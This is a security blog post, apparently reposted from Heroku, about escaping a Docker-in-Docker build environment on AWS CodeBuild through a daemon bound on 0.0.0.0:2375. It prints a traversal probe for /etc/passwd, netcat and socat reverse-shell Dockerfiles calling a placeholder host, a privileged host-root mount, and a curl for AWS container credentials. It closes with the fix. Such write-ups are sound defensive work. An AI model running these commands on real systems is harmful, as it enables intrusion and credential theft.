This post originally appeared on Heroku's Engineering Blog.

Containers, and Docker specifically, are all the rage. Most DevOps setups feature Docker somewhere in the CI pipeline, which likely means that any build environment you look at will be using a container solution such as Docker. These build environments need to take untrusted, user-supplied code and execute it, so it makes sense to containerize that execution securely to minimize risk.

In this post, we’re going to explore how a small misconfiguration in a build environment can create a severe security risk.

It's important to note that this post does not describe any inherent vulnerability in Heroku, Docker, AWS CodeBuild, or containers in general. It discusses a misconfiguration issue that was found when reviewing a Docker container-based, multi-tenant build environment. These technologies offer pretty solid security defaults out of the box, but when things start to get layered together, small misconfigurations can sometimes cause large issues.

Building

A possible build environment could have the following architecture:

- AWS CodeBuild for infrastructure "hosting"

- A Docker container in Docker build service

The Docker container could be created through dind (Docker-in-Docker), so in theory you end up with two containers that an attacker would need to escape. Using CodeBuild reduces the attack surface further, as you have single-use containers supplied by AWS, with no danger of tenants interacting with each other's build process.

Let’s have a look at the proposed build process, and more specifically, how an attacker would be able to control the build process.

The first thing to do in most build/CI pipelines would be to create a git repository with the code you wish to build and deploy. This would get packaged up and transferred to the build environment and then passed through to the docker build process.

Looking at build services you usually find two ways a container can be provisioned - through a Dockerfile or a config.yml, both of which get bundled along with the source code.

A CI config file, let's call it config-ci.yml, could look as follows:

image: ruby:2.1

services:

- postgres

before_script:

- bundle install

after_script:

- rm secrets

stages:

- build

- test

- deploy

This file then gets converted into a Dockerfile by the build process, before the rest of the build kicks off.

In the case where you explicitly specify a Dockerfile to be used, you change the config-ci.yml to the following:

docker:
  web: Dockerfile_Web
  worker: Dockerfile_Worker

Where Dockerfile_Web and Dockerfile_Worker are the relative paths and names of the Dockerfiles in the source code repository.

Now that the build information has been supplied, the build could be initiated. The build is normally started through a git push on the source repository. When this is initiated you would see output similar to the following:

Counting objects: 22, done.

Delta compression using up to 8 threads.

Compressing objects: 100% (21/21), done.

Writing objects: 100% (22/22), 7.11 KiB | 7.11 MiB/s, done.

Total 22 (delta 11), reused 0 (delta 0)

remote: Compressing source files... done.

remote: Building source:

remote: Downloading application source...

remote: Sending build context to Docker daemon 19.97kB

remote: Step 1/9 : FROM alpine:latest

remote: latest: Pulling from library/alpine

remote: b56ae66c2937: Pulling fs layer

remote: b56ae66c2937: Download complete

remote: b56ae66c2937: Pull complete

remote: Digest: sha256:d6bfc3baf615209a8d607ba2a8103d9c8a405b3bd8741d88b4bef36478

remote: Status: Downloaded newer image for alpine:latest

remote: ---> 053cde6e8953

remote: Step 2/9 : RUN apk add --update --no-cache netcat-openbsd docker

As you can see, the output of docker build -f Dockerfile . is returned to us. This is useful for debugging, and equally useful for spotting possible attacks.

Attacking Pre-Build

The first idea that came to mind was to interrupt the build process before we even get to the docker build step. Alternatively, we could attempt to link files from the CodeBuild environment into our Docker build context.

Since we controlled the config-ci.yml file contents, and more specifically the "relative path to the Dockerfile to use", we could try an old-fashioned directory traversal attack.

The first attempt at this was simply to change the directory being used for the build:

docker:
  web: ../../../../../

Once the build process started, we immediately got the following error:

Error response from daemon: unexpected error reading Dockerfile: read /var/lib/docker/tmp/docker-builder991278373/output: is a directory

Interesting, we have caused an error and have a path leak. What happens if we try and "read" a file?

docker:
  web: ../../../../../../../etc/passwd

And suddenly we have parsing errors from the Docker daemon. Unfortunately, this will only give us the first line of any file on the system. Nonetheless, an interesting start.

Error response from daemon: Dockerfile parse error line 1: unknown instruction: ROOT:X:0:0:ROOT:/ROOT:/BIN/BASH

Error response from daemon: Dockerfile parse error line 1: unknown instruction: ROOT:*:17445:0:99999:7:::

Another idea here could be to try and use symlinks to include files into our build. Fortunately, Docker prevents this, as it won't include files from outside the build directory into the build context.
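The path leak above comes from accepting a user-controlled "relative path" without checking where it resolves. As a minimal sketch of the kind of check a build service could apply before handing the path to docker build, assuming a hypothetical helper named resolve_dockerfile (neither the name nor the policy comes from the build environment reviewed here):

```python
import os


def resolve_dockerfile(repo_root: str, relative_path: str) -> str:
    """Return the absolute path of a user-supplied Dockerfile, or raise ValueError.

    Hypothetical helper for illustration only; it is not part of Docker,
    CodeBuild, or the build service discussed in this post.
    """
    root = os.path.realpath(repo_root)
    # realpath collapses ".." segments and follows symlinks, so traversal
    # strings and symlink tricks are both resolved before the comparison.
    candidate = os.path.realpath(os.path.join(root, relative_path))
    # An absolute relative_path replaces root in os.path.join and is
    # rejected here as well.
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError(f"{relative_path!r} escapes the repository root")
    if not os.path.isfile(candidate):
        raise ValueError(f"{relative_path!r} is not a regular file")
    return candidate
```

With a check along these lines, both ../../../../../ and ../../../../../../../etc/passwd would be rejected before the Docker daemon ever tries to read them.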

Attacking the Build: Vulnerability Found

Time to go back to the actual build process and see what we could attack. A quick refresher: the build process happens inside the dind Docker container, which runs inside a one-off CodeBuild instance. To add further to our layers, the docker build process runs all commands in one-off Docker containers. This is standard fare for Docker: each step of a Docker build is actually a new Docker container, as can be seen in the output from our build process.

remote: ---> 053cde6e8953

remote: Step 2/9 : RUN apk add --update --no-cache netcat-openbsd docker

remote: ---> Running in e7e10023b1fc



In the above case, step 2/9 is executed in a new Docker container, e7e10023b1fc. So even if a user decides to insert some malicious code into the Dockerfile, it should be running in a one-off, isolated container, unable to do any damage. The accompanying diagram depicts this layering.

When issuing Docker commands, these are actually passed to the dockerd daemon, which is in charge of creating, running, and managing Docker images. For dind to work, it would normally need to run its own Docker daemon. However, as implemented here, dind uses the host system's dockerd instance, allowing the host and dind to share Docker images and benefit from all the caching Docker does.

Suppose dind is started up with the following wrapper script:

/usr/local/bin/dind dockerd \
  --host=unix:///var/run/docker.sock \
  --host=tcp://0.0.0.0:2375 \
  --storage-driver=overlay &>/var/log/docker.log

Where /usr/local/bin/dind is simply a wrapper script to get Docker running inside a container.

The wrapper script ensures that the Docker socket from the host is made available inside the container. This specific configuration introduces a security vulnerability.

Normally the docker build process would have no way to interact with the Docker daemon; in this case, however, it can. The keen observer might notice that the TCP port for the dockerd daemon is also mapped through with --host=tcp://0.0.0.0:2375. This misconfiguration sets the Docker daemon to listen on all interfaces of the container, which becomes an issue because of the way Docker networking functions. All containers are put into the same default Docker network unless otherwise specified, so every container is able to communicate with every other container without hindrance.

Now during our build process, our temporary build container (the one executing user code) is able to issue network requests to the dind container hosting it. And because the dind container is simply reusing the host system's Docker daemon, we actually issue commands directly to the host system, AWS CodeBuild.

When Dockerfiles Attack

To test this, the following Dockerfile could be supplied to the build system, allowing us to gain interactive access to the container being built. This simply allows for speedier exploration, rather than waiting for the build process to complete each time:

FROM alpine:latest

RUN apk add --update --no-cache netcat-openbsd docker

RUN mkdir /files

COPY * /files/

RUN mknod /tmp/back p

RUN /bin/sh 0</tmp/back | nc x.x.x.x 4445 1>/tmp/back

Yes, the reverse shell could be done in a bunch of different ways.

This Dockerfile installs a few dependencies, namely docker and netcat. It then copies the files in our source code directory into the build container. This will be needed in a later step and also makes it easier to quickly transfer our full exploit to the system. The mknod instruction creates a named pipe (FIFO), which allows stdin and stdout to be redirected through the file. A reverse shell is then opened using netcat. We also need to set up a listener for this reverse shell on a system we control with a public IP address:

nc -lv 4445

Now when the build happens, a reverse connection will be received:

[ec2-user@ip-172-31-18-217 ~]$ nc -lv 4445

Connection from 34.228.4.217 port 4445 [tcp/upnotifyp] accepted

ls

bin

dev

etc

files

home

lib

media

mnt

proc

root

Now, with remote interactive access, we could check whether the Docker daemon could be accessed:

docker -H 172.18.0.1 version

We specify the remote host by using -H 172.18.0.1. This address was chosen because we had discovered that the network range used by Docker is 172.18.0.0/16. To find this, we ran ip addr and ip route in our interactive shell to get the network assigned to our build container. Remember that all Docker containers are put into the same network by default. The default gateway is the instance that the Docker daemon is running on.
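The step from the network range to the address passed to -H can be sketched with Python's standard ipaddress module. This assumes that the gateway sits on the first usable address of the range, which matches the 172.18.0.1 used in this post; the output of ip route remains the authoritative source. The function name first_host is made up for this illustration.

```python
import ipaddress


def first_host(cidr: str) -> str:
    """Return the first usable address in a network such as 172.18.0.0/16.

    Assumption: the gateway lives on the first usable address. Check the
    default route reported by `ip route` rather than relying on this.
    """
    network = ipaddress.ip_network(cidr, strict=True)
    # hosts() skips the network address itself, so the first item is .1
    return str(next(iter(network.hosts())))


print(first_host("172.18.0.0/16"))  # 172.18.0.1
```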

Client:

Version: 17.05.0-ce

API version: 1.29

Go version: go1.8.1

Git commit: v17.05.0-ce

Built: Tue May 16 10:10:15 2017

OS/Arch: linux/amd64

Server:

Version: 17.09.0-ce

API version: 1.32 (minimum version 1.12)

Go version: go1.8.3

Git commit: afdb6d4

Built: Tue Sep 26 22:40:56 2017

OS/Arch: linux/amd64

Experimental: false

Success! At this point we have access to Docker from within the container being built. The next step is to start up a new container with additional privileges.

Stack Them

We have a shell, but it is in the throw-away build container - not very helpful. We also have access to the Docker daemon. How about combining the two? For this, we introduce a second Dockerfile, which when built and run will create a reverse shell. We start up a second listener to catch the new shell.

FROM alpine:latest

RUN apk add --update --no-cache bash socat

CMD socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:x.x.x.x:4446

This is saved as Dockerfile2 in the source-code directory. Now when the source-code files are copied into the build container, we can access it directly.

When we re-run the build process, we get our first reverse shell on port 4445, which leaves us in the build container. Now we can build Dockerfile2, which was copied into our build container with COPY * /files/:

cd files

docker -H 172.18.0.1 build -f Dockerfile2 -t pew .

A new Docker image has now been built using the host Docker daemon and is available. We simply need to run it. One additional trick is needed here: we need to map the root directory through into the new Docker container. This can be done with -v /:/vhost.

In our first reverse shell:

docker -H 172.18.0.1 run -d --privileged --net=host -v /:/vhost pew

A new reverse shell will now connect to port 4446 on our attacker system. This drops us into a shell in a new container with direct access to the underlying CodeBuild host's filesystem and network. First, --net=host maps the host network through instead of keeping the container in an isolated network. Second, because the Docker daemon is running on the host system, the file mapping done with -v /:/vhost maps through the host system's filesystem.

In the new reverse shell, it's now possible to explore the underlying host filesystem. We could prove we are outside of Docker when interacting with this filesystem, by checking the difference between /etc/passwd and /vhost/etc/passwd.
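One way to make that comparison concrete is to list the accounts that appear only in the host's copy of the file. The following is a minimal sketch, assuming the standard colon-separated passwd format; the helper names and the sample entries are invented for illustration and are not taken from the system described here.

```python
def usernames(passwd_text: str) -> set:
    """Extract the login names (first colon-separated field) from passwd text."""
    names = set()
    for line in passwd_text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            names.add(line.split(":", 1)[0])
    return names


def accounts_only_on_host(container_passwd: str, host_passwd: str) -> list:
    """Return the accounts present in the host file but not in the container's."""
    return sorted(usernames(host_passwd) - usernames(container_passwd))


# Illustrative, made-up contents; in practice these would be read from
# /etc/passwd and /vhost/etc/passwd inside the second reverse shell.
container = "root:x:0:0:root:/root:/bin/ash\n"
host = "root:x:0:0:root:/root:/bin/bash\nexample-user:x:1000:1000::/home/example-user:/bin/bash\n"
print(accounts_only_on_host(container, host))
```

Any account that exists only under /vhost is a strong hint that the mounted filesystem belongs to a different system than the container we are running in.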

Inside /vhost we also found an additional directory, which clearly indicates we are inside the CodeBuild instance's filesystem and not just any Docker container:

3243e490ebd3:/# cd /vhost/

3243e490ebd3:/vhost# ls

bin dev lib mnt root srv usr

boot etc lib64 opt run sys var

codebuild home media proc sbin tmp

The magic happens inside codebuild. This is what AWS CodeBuild uses to control the build environment. A quick look around reveals some interesting data.

3243e490ebd3:/vhost/codebuild# cat output/tmp/env.sh

export AWS_CONTAINER_CREDENTIALS_RELATIVE_URI='/v2/credentials/e13864de-c2aa-44ab-be11-59137341289d'

export AWS_DEFAULT_REGION='us-east-1'

export AWS_REGION='us-east-1'

export BUILD_ENQUEUED_AT='2017-11-20T15:06:37Z'

export CODEBUILD_AUTH_TOKEN='11111111-2222-3333-4444-555555555555'

export CODEBUILD_BMR_URL='https://CODEBUILD_AGENT:3000'

export CODEBUILD_BUILD_ARN='arn:aws:codebuild:us-east-1:00112233445566:user:11111111-2222-3333-4444-555555555555'

export CODEBUILD_BUILD_ID='111111:11111111-2222-3333-4444-555555555555'

export CODEBUILD_BUILD_IMAGE='codebuild/image'

export CODEBUILD_BUILD_SUCCEEDING='1'

export CODEBUILD_GOPATH='/codebuild/output/src794734460'

export CODEBUILD_INITIATOR='api-client-production'

export CODEBUILD_KMS_KEY_ID='arn:aws:kms:us-east-1:112233445566:alias/aws/s3'

export CODEBUILD_LAST_EXIT='0'

export CODEBUILD_LOG_PATH='0ff0b448-6bed-4af1-8be5-539233fa2e9e'

export CODEBUILD_SOURCE_REPO_URL='builder/builder-source.zip'

export CODEBUILD_SRC_DIR='/codebuild/output/src794734460/src/builder-source.zip'

export DIND_COMMIT='3b5fac462d21ca164b3778647420016315289034'

export DOCKER_VERSION='17.09.0~ce-0~ubuntu'

export GOPATH='/codebuild/output/src794734460'

export HOME='/root'

export HOSTNAME='3243e490ebd3'

...

At this point, we would usually try to extract AWS credentials and pivot. To do this here, we need to use the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI value:

curl -i http://169.254.170.2/v2/credentials/e13864de-c2aa-44ab-be11-59137341289d

{"RoleArn":"AQIC...",

"AccessKeyId":"ASIA....",

"SecretAccessKey":"uVNs32...",

"Token":"AgoGb3JpZ2luEJP...",

"Expiration":"2017-11-20T16:06:50Z"}

Depending on the permissions associated with that IAM role, there should now be the opportunity to move around the AWS environment.
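The URL requested with curl above is simply the link-local credentials address followed by the relative URI found in env.sh. A minimal sketch of that composition follows, assuming env.sh contains only lines of the form export KEY='value' as in the listing; the helper names parse_exports and credentials_url are hypothetical, and the sketch only builds the URL without making any request.

```python
import shlex

# Link-local address used in the curl request shown in this post.
CREDENTIALS_HOST = "http://169.254.170.2"


def parse_exports(text: str) -> dict:
    """Parse lines of the form export KEY='value' into a dictionary.

    Assumes well-formed shell quoting; shlex raises ValueError otherwise.
    """
    env = {}
    for line in text.splitlines():
        tokens = shlex.split(line, comments=True)
        if len(tokens) == 2 and tokens[0] == "export" and "=" in tokens[1]:
            key, _, value = tokens[1].partition("=")
            env[key] = value
    return env


def credentials_url(env: dict) -> str:
    """Join the credentials host with the relative URI from the environment."""
    return CREDENTIALS_HOST + env["AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"]


sample = """
export AWS_CONTAINER_CREDENTIALS_RELATIVE_URI='/v2/credentials/e13864de-c2aa-44ab-be11-59137341289d'
export AWS_DEFAULT_REGION='us-east-1'
"""
print(credentials_url(parse_exports(sample)))
```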

The above steps could be automated and done with only one reverse shell. Remember, however, that you need to keep the build environment alive. A reverse shell does that, but a long-running process should also do the trick. The main thing is that you don't want the initial docker build to complete, as this will initiate the tear-down of your build environment. Also note that most build environments tend to give you 30-60 minutes before they are automatically torn down.

Patching

The fix, in this case, is extremely simple: never bind the Docker daemon on all interfaces. Removing the line --host=tcp://0.0.0.0:2375 from the wrapper script takes care of this. There is no need to bind to a TCP port, since the Unix socket is already being mapped through with --host=unix:///var/run/docker.sock.
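A check like this is easy to automate when reviewing wrapper scripts. The sketch below scans a dockerd argument list for tcp:// listeners that are not bound to a loopback address. The function name exposed_tcp_hosts is hypothetical, and the parsing only covers the --host=VALUE, --host VALUE, and -H VALUE forms, so treat it as a starting point rather than a complete audit.

```python
import ipaddress
from urllib.parse import urlsplit


def exposed_tcp_hosts(argv: list) -> list:
    """Return the tcp:// listen addresses in argv that are not loopback-only."""
    listeners = []
    args = iter(argv)
    for arg in args:
        if arg in ("-H", "--host"):
            value = next(args, "")
        elif arg.startswith("--host="):
            value = arg.split("=", 1)[1]
        else:
            continue
        if value.startswith("tcp://"):
            listeners.append(value)

    exposed = []
    for value in listeners:
        hostname = urlsplit(value).hostname or ""
        try:
            loopback = ipaddress.ip_address(hostname).is_loopback
        except ValueError:
            # Not an IP literal; only the name "localhost" is treated as safe.
            loopback = hostname == "localhost"
        if not loopback:
            exposed.append(value)
    return exposed


wrapper_args = [
    "/usr/local/bin/dind", "dockerd",
    "--host=unix:///var/run/docker.sock",
    "--host=tcp://0.0.0.0:2375",
    "--storage-driver=overlay",
]
print(exposed_tcp_hosts(wrapper_args))  # ['tcp://0.0.0.0:2375']
```

Run against the wrapper script from this post, the check flags the 0.0.0.0 listener and leaves the Unix socket alone.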

Conclusion

Containers offer a great mechanism for creating secured environments in which to run untrusted code, without requiring additional virtualization. These containers are, however, only as secure as their configuration. They are pretty secure by default, but a single misconfiguration is all it takes to bring down the whole house of cards. Build environments offer an interesting architectural challenge, and you'll always need to think in terms of security layers.